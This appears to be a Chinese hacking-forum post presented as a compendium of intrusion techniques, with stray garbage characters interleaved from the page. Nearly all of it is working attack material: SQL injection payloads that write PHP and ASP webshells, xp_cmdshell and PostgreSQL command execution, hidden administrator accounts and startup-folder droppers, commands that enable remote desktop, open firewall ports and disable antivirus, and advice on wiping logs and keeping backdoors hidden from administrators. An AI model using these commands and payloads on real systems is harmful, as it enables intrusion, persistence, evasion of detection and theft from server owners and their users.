中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

---

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

1.net user administrator /passwordreq:no
; `7 n4 ^9 t$ h1 s, @. x这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
2.比较巧妙的建克隆号的步骤
* \5 I* i# M8 s- O/ @先建一个user的用户
( ~# [+ p5 _- @+ O! Q5 A然后导出注册表。然后在计算机管理里删掉
在导入，在添加为管理员组
- q% H" Z, I# ~( m3.查radmin密码
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4 W+ g" p2 N1 E/ g0 \; d4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
' W8 [" y$ {7 u" u4 `5 k" u建立一个"services.exe"的项
4 I, n$ t- M- c* p! [再在其下面建立(字符串值)
; x; @. A% z2 _( }& N, I! k3 Z6 Q6 t键值为mu ma的全路径
3 b! E( [; M# O: Q% K5.runas /user:guest cmd
4 t% M$ n: H) o2 B: e/ ~6 T! w测试用户权限！
2 {4 X+ g- J' K! M9 B* x0 l9 i6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
. b( w( y- ^3 Y/ y: I7.入侵后漏洞修补、痕迹清理，后门置放：
基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
$ I7 T+ M7 |; U1 ]2 O8 D8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
" h1 v4 T4 C+ l& c
2 R! ~5 d# D3 F8 w7 r& D* ifor example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
  ^5 X/ i7 e- l, h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'

; |* m. z6 \) r9 q% F; a3 T$ n9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
& \" o4 \1 v& w. m可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。

分析器
1 ~5 q3 M! I' I# S$ d6 m  I* l7 kEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ l2 z3 t. |3 _- ^( c, M10.xp_cmdshell新的恢复办法
3 z- u# Y8 ^" Q/ F2 fxp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
2 ?, h4 ]8 {# ^  C; E9 f* D删除
+ h  Q! ?# j  Mdrop procedure sp_addextendedproc
+ r* Y) y8 U2 p+ K8 j) ?drop procedure sp_oacreate
! j/ p9 G& F3 W. A7 D3 Cexec sp_dropextendedproc 'xp_cmdshell'

1 }: R6 b7 E( m7 z恢复
0 B5 t  c* {. p! x- s7 ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")
  Z* V" z2 X2 \- }dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
; Y( \* k2 H  ]2 ]) |4 C9 y; j
1 k9 {- h1 t  q0 X: \- Q这样可以直接恢复，不用去管sp_addextendedproc是不是存在
3 D$ z9 g7 n6 l8 o' Y, m
: G  H6 e! l9 z7 V* i; p, m$ k-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

4 b- k; ]* ]! I& A9 I% T; n恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 c% F, Z0 E% o1 e  \% z$ q4 i- R
: e$ s! x  x) m! _9 ?) E: d
开启cmdshell的sql语句
2 ~- Q) p0 g. P" D2 V) R
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
5 b) _0 ^) H2 s
" ?, B* c% A2 f/ G. l判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
  K( n0 V, e8 j* [, f返回结果为1就ok

否则上传xplog7.0.dll
, b5 N9 V0 D8 A5 T, o$ ^9 t" Aexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

) x- ^  Z, T$ B9 ~! u' {堵上cmdshell的sql语句
2 p" N/ K  Q" _+ a3 I$ U, ~7 |sp_dropextendedproc "xp_cmdshel
" [4 r# T8 l% g) c5 |1 g/ n! S) k& d-------------------------
0 y7 @) l/ W6 U. o' H8 h清除3389的登录记录用一条系统自带的命令：
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f

然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
( O) `9 V5 _- L! `6 Z# Q在 mysql里查看当前用户的权限
. r+ a9 S: d" c! ?7 w0 F$ z5 p% yshow grants for  
' l# U0 B. H9 _) e2 Q6 G! C# Q
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
# P$ @2 }, o: X* p4 P
& i  O2 ^) G/ _( t( p
7 Y. k& ?5 M9 I" P& VCreate USER 'itpro'@'%' IDENTIFIED BY '123';
* [6 p0 i% |, t5 x! `) A, O, D
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION

MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0

% Q  L5 h' d& A  fMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 @0 A- @) R* O) Y1 c( Z" _2 v
' s" Y; k( g  c, a+ \) A搞完事记得删除脚印哟。

* m- b  F# h/ |1 p0 x5 hDrop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;
* \  D  \3 ~. o6 u. U* q3 B& p
8 S6 ?4 w" c# i, n当前用户获取system权限
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
' P6 f5 E' M2 @% I& ]程序代码
  g) l+ C% p- g7 t$ ?9 @<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
7 d: c9 o7 R4 B4 a2 d' Y, D, los="WinNT://"&wsnetwork.ComputerName
: Z8 \+ Y  [) F9 _# k2 GSet ob=GetObject(os)
( H/ X* c4 \* n7 J+ T% n& n. R5 gSet oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
' U( |2 y7 j- S; V* r/ ?+ m& god.SetInfo
Set of=GetObject(os&"/nosec",user)
% f0 g4 |& D5 ~2 U* Q- \8 T1 joe.add os&"/nosec"
" V6 z- ^% \: H$ q3 V  W/ q</Script>
<script language=javascript>window.close();</script>
' z& J  x( F$ q8 R# y1 K0 \/ P
; N+ g/ K) ]3 V2 }# u


突破验证码限制入后台拿shell
. g  v4 D8 ^0 c2 Q1 j6 |3 s! \程序代码
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
0 @) v- b1 i3 i' U8 Q9 W  K+ C"BlockXBM"=dword:00000000

保存为code.reg，导入注册表，重器IE
# Z4 D" W; @( c$ C% n+ P2 v2 c就可以了
( a3 P/ E. c/ Xunion写马
程序代码
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
  W  u7 p  p8 `0 a- y
应用在dedecms注射漏洞上,无后台写马
dedecms后台，无文件管理器，没有outfile权限的时候
" p0 u) h8 d. k( R在插件管理-病毒扫描里
) W1 k5 _0 T: \  B写一句话进include/config_hand.php里
! Q1 I& O- E! Z# {" R6 M( s8 n程序代码
4 i( j- h/ a9 U$ K>';?><?php @eval($_POST[cmd]);?>


5 Z8 D. r* R' L# z$ L如上格式
2 ~! A0 k6 v2 u. _/ U+ r
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码
select username,password from dba_users;
6 x" y; j  E, Z

mysql远程连接用户
程序代码

, S8 j- z& x6 t  L% jCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 U- H; @3 ^" ?* A) hMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 Q/ @" x  i4 a7 m: K
  A+ X# L; C4 l/ Z$ [" R, W* Z2 ]

8 y5 c* ]3 E( ]6 y
" A3 r% Y. E* ?echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
* T) U( O; v4 v2 _$ x
1.查询终端端口
7 I5 @1 g, X1 E, U& l; ^0 r9 x% R
8 ^/ M: ?2 ^% G4 Y4 i6 rxp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 [- G* |! H' k  f+ g% W: `. ?8 z" p
. X7 @; n, S: ?9 k% {2 B通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2.开启XP&2003终端服务

! J1 M/ b/ z# }. }3 c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
9 l, v  s; {' R

9 J2 ~2 d; ~0 s+ f3 TREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

1 Y7 x0 m" h" U" C3.更改终端端口为20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
+ j& r' D: R: g1 _# |8 b3 o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

$ \1 h" q' f# r  Y9 c, k0 x$ L4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

8 T- m! n" M9 Z; L1 u
5.开启Win2000的终端，端口为3389(需重启)
1 E# R2 K3 S& \: @
: _: D8 f- X' [echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
3 T5 O; J, A* d& t" n8 x2 V8 {+ t* t  ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! q6 P* r( p1 C, U" f6 l# Yecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
, ?7 V4 D5 d6 t8 ^; [/ o- p" h+ Uecho "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
0 X9 P, n; o2 P; wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
/ n. N, L8 C" F# recho "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
" d4 X( t) d& l" `; hecho "ortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
( S2 w2 `( E  o
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

8 u- D, a+ @+ h( r  j@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
. k; O+ K& F  A' I/ u! cecho [defaultinstall] >> restart.inf
7 ]/ V1 p5 O0 D- Frundll32 setupapi,%inf% 1 %temp%\restart.inf
: ~2 B) P% l$ E4 d9 b. o
' n5 {* K$ j0 B1 s0 C
7.禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命令来连接

- Y" L  w* f2 s) a4 P* a; k$ Y) Cmstsc /v:ip:3389 /console
3 `) f: J& [7 G0 y
5 ]+ |# H+ ~/ M) \( ]/ T- n9.调整NTFS分区权限
6 P# l8 ~, ~( _% M: n$ I
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
% v# j1 g8 I6 m+ \  Q; S7 c  d6 Z
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
; L. h/ J9 {- N
4 D: }1 D. T0 f$ q+ M" C# z------------------------------------------------------
2 `; m& Q: Q/ S3389.vbs
2 r; M6 e4 E- jOn Error Resume Next
. ~/ W/ [/ x5 b/ m3 V( @: [( A9 bconst HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 e1 n2 F. v2 w, P9 Z! loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
* h0 C* X* }- R4 o4 edwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# [7 U% r2 y, x* x1 q$ |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "ortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" v* Z0 \; N( E" S: astrValueName = "ortNumber"
0 @  H9 T0 H3 n# [: D4 J5 \  A" rdwValue = 3389
) G: h) ~! s& L: Ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! c: m' i$ c. o( fSet R = CreateObject("WScript.Shell")
, ^' S/ x6 y2 `: n- S- l0 E; AR.run("Shutdown.exe -f -r -t 0")
- a3 b: b7 S" d) w; ~, c
删除awgina.dll的注册表键值
. b; Y. [" f2 g程序代码
; }. Q+ m3 T/ `6 M/ T6 {- D/ |
# R7 I( r- T5 S' B- L+ \reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
2 Q1 h+ T) f; t. L

7 M( V9 S- x# e5 j# l* x

程序代码
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

" V8 H& y5 L3 }7 `; H) J# s2 L设置为1，关闭LM Hash
; }/ B7 f, R: M& M& I  h
+ G; ?6 U. R- U% A数据库安全:入侵Oracle数据库常用操作命令
" D& L$ W4 p+ _3 d4 D) _& b: C最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
1 C( ^  Y! q' \; C; V1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 k- v* V1 _; r7 n3、SQL>connect / as sysdba ;（as sysoper）或
  w" q# `7 ?  b9 j. R' Y# `1 Yconnect internal/oracle AS SYSDBA ;(scott/tiger)
, W2 ]2 [7 z  }7 D5 [conn sys/change_on_install as sysdba;
4、SQL>startup; 启动数据库实例
7 Y: D+ Y- C' u' j5、查看当前的所有数据库: select * from v$database;
" t" _" h' L7 l+ V# S0 ~select name from v$database;
6、desc v$databases; 查看数据库结构字段
3 q, Y# B' H8 ?) Q8 X3 N7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
SQL>select * from V_$PWFILE_USERS;
  `5 ?  `9 B( \+ N! t6 pShow user;查看当前数据库连接用户
4 M9 ?) }$ f3 \( m4 ]/ I8、进入test数据库：database test;
9、查看所有的数据库实例：select * from v$instance；
如：ora9i
10、查看当前库的所有数据表：
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
) r5 O, b+ D: s1 ~5 t% D% v11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
desc CQI.T_BBS_XUSER;
- S/ f2 m  v6 o: n. n2 l3 a13、获得CQI.T_BBS_XUSER表中的记录：
select * from CQI.T_BBS_XUSER;
14、增加数据库用户：(test11/test)
! _+ P) e9 M) @: S+ e) O" h9 u% n# wcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15、用户授权:
grant connect,resource,dba to test11;
& X9 A9 g9 w4 X8 t9 Ggrant sysdba to test11;
) z5 T( L( }& M# mcommit;
5 i) B) j& L! n  K16、更改数据库用户的密码：(将sys与system的密码改为test.)
; W, ~; Q+ p( I% valter user sys indentified by test;
alter user system indentified by test;

  {4 j+ L% ~5 G+ Z& ZapplicationContext-util.xml
3 J5 E5 j+ \) s$ ~' W/ PapplicationContext.xml
% \. D* S: o0 i+ S# \struts-config.xml
web.xml
8 t  G* O* Z# A1 Z" G8 \3 bserver.xml
) O+ `1 {  n5 g& C6 f) W/ h6 S! Ztomcat-users.xml
5 ^/ h* |! Q5 j! P) phibernate.cfg.xml
database_pool_config.xml
# v' t0 C" ], G' B8 F4 h

\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
, Q. t+ b  g. z& h\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构

spring.properties 里边包含hibernate.cfg.xml的名称


: s# `8 y( _3 q" q1 N1 @  m8 UC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

如果都找不到  那就看看class文件吧。。

6 J: K5 F9 J8 u测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! `$ d6 e3 ~/ \1 Z1 x
# A' c3 J: l( v5 H  p测试2：

: B+ M& [: }" h3 h& d! M) K3 q4 Rcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. {' B* ^3 Z7 |, y+ m
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

, r  R3 K; ?6 Q0 Z, `% F! pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 N/ z- |1 @+ {- A$ x1 L0 G
. l6 g  ^  c7 i# Q. {; X* A+ I% M( ^( X查看虚拟机中的共享文件：
- C1 t+ M) l! [在虚拟机中的cmd中执行
\\.host\Shared Folders
3 e8 W! r6 [5 l0 ^* V
3 ~; P3 F8 `* E) @5 l* p2 T- ucmdshell下找终端的技巧
找终端：
第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
　　 而终端所对应的服务名为：TermService
: i) Z8 q9 o: q( u# K- `第二步：用netstat -ano命令，列出所有端口对应的PID值!
# f$ N7 G1 @5 r9 r& B2 u) a+ _　　 找到PID值所对应的端口
2 S$ z* S5 K7 e/ ?9 p2 U. y
0 c) E8 o) E' N$ ^) \2 j查询sql server 2005中的密码hash
SELECT password_hash FROM sys.sql_logins where name='sa'
/ R: R- T! A* h# \9 sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
  z8 B, z5 n: l- S* T1 M6 P) P4 @access中导出shell
9 M" y5 z7 \) k$ @* ^; i
中文版本操作系统中针对mysql添加用户完整代码：

use test;
create table a (cmd text);
1 S, Y7 }/ g3 s$ l" ~; m7 Pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
' `5 G; I5 R3 q; W  ]" ]select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
! a. f5 n6 `/ Y& N' Kdrop table a;

- s( k1 P; F9 H% C- ~" X英文版本：
( g. D9 r3 J1 F1 |+ f; Y" f! l+ ^
# S/ b0 Q2 D; Q7 d9 l6 @& g; ^use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ U$ K$ W, \! k* w. A& @0 Q; ^insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& x' G1 T7 w8 r5 t- f4 d- S5 Rselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( E6 P0 y! H2 Y7 m- t$ e; xdrop table a;

  I& C4 {, x! F5 i; h1 Rcreate table a (cmd BLOB);
insert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
drop table a;

记录一下怎么处理变态诺顿
" ^; e7 c! ^' \! K; e& {4 q6 ~; f查看诺顿服务的路径
sc qc ccSetMgr
! p( K! h# r  u9 w1 y' p然后设置权限拒绝访问。做绝一点。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
9 f0 G5 y, N( F" z
然后再重启服务器
3 s1 V0 L9 x2 x$ K2 a  `iisreset /reboot
这样就搞定了。。不过完事后。记得恢复权限。。。。
9 \) V; m; k2 ]5 [) C$ E: ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
3 q, j9 R: e8 t) c" y/ icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& i5 Q6 l$ o: K% v* gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
4 g. {( G- U* Q  f  o8 s! e
& F9 l- I% \% ^8 @9 `& HEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

postgresql注射的一些东西
4 E! t  n# U6 J: i如何获得webshell
" @5 ]4 q! v- f! e0 b4 mhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
( j6 c; ?7 |$ g* A9 e- yhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 H( b3 M5 k" [; Ghttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
& _# v0 ^3 \0 }; ?如何读文件
. ]( b9 q4 V! Chttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
4 Y( S7 |6 q+ F$ Y/ Dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
3 e0 I3 `) R/ I# M2 mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;

' D1 n! C4 L3 d) C. Fz执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
当然，这些的postgresql的数据库版本必须大于8.X
创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
/ q/ m3 j8 p& I
6 o) G" M% U$ W4 t4 ]创建一个输出表：
5 T  F7 n% j: M* y  ?9 aCREATE TABLE stdout(id serial, system_out text)

执行shell，输出到输出表内：
SELECT system('uname -a > /tmp/test')
1 g' V& P& V: @9 q% }( g
6 i+ K; m. p% \7 A; T/ o: Icopy 输出的内容到表里面；
6 p/ V6 v; c( c; MCOPY stdout(system_out) FROM '/tmp/test'

2 z$ N/ V3 ?- t1 e从输出表内读取执行后的回显，判断是否执行成功
5 G9 F5 l- i' B4 e
SELECT system_out FROM stdout
1 @0 o' Z+ j3 d- ^  p7 L下面是测试例子

7 v* J* ?0 X' N/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

5 w# a9 y4 j  z) j, {4 x5 o$ ]- b. J/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
8 }; p6 i" n- \" B5 R. n: eSTRICT --
# S! E0 g; s* A6 N; o) v
/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 H6 B! M+ n/ ynet stop sharedaccess    stop the default firewall
! b( ]: F. Y; r* [- O) X1 Mnetsh firewall show      show/config default firewall
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改

9 H, l" }: q: V8 ~, u8 z+ D0 y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
9 W9 C2 z0 y& P7 SPortNumber值，默认是3389，修改成所希望的端口，比如6000
7 L) }5 W4 t# M( L/ x
. b5 O  x/ w4 o5 _第二个地方：
* r- X( D  ?+ w: z; G1 `  C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如6000

- S& Z+ ]$ w8 o' `% t现在这样就可以了。重启系统就可以了

4 X5 M- i- e# H; `, H9 b& i查看3389远程登录的脚本
+ f! Q! d4 O% I: X+ Y保存为一个bat文件
1 ]3 ?( x. i. |# }6 D2 ^' @date /t >>D:\sec\TSlog\ts.log
  W" ?/ J! W, Z. `3 b3 X& Ptime /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
1 N# g$ J' Q8 O0 b/ z% z* _
6 E# n$ O; w+ w: Smstsc的参数：

远程桌面连接

MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
